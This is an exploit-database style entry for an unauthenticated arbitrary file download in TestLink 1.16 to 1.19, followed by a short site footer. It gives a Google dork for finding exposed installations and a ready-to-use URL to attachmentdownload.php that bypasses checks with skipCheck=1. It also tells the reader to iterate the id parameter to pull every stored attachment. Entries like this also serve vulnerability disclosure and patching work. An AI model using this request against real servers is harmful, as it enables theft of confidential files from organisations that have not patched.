# Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated) # Google Dork: inurl:/testlink/ # Date: 07/12/2021 # Exploit Author: Gonzalo Villegas (Cl34r) # Exploit Author Homepage: https://nch.ninja # Vendor Homepage: https://testlink.org/ # Version:1.16 <= 1.19 # CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1) Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1" for research notes: https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
